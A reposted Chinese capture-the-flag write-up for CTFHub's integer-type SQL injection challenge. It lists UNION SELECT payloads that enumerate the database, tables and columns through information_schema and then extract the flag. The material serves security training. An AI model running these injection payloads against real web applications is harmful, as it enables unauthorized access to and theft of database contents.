CTFHub SQL注入 整数型注入

CTFHub SQL注入 整数型注入

强烈推荐这个网站 CTFhub https://www.ctfhub.com/
分各个类别，题目由易到难

这题还是很基础的，有各种提示
打开是源码，?id=处存在注入
/?id=1 or 1=1

然后就是爆数据库名，information_schema三步
以下是详细步骤：

1. ?id=1 or 1=1 union select 1,database()
   得到数据库名为sqli
   2.?id=1 or 1=1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
   
   回显得到表名
   3、

?id=1 or 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='143232859127690'

得到字段名flag
4.

?id=1 or 1=1 union select 1,group_concat(flag) from sqli.143232859127690

得到flag

来源：CSDN

作者：wind lin

链接：https://blog.csdn.net/weixin_44732566/article/details/104284105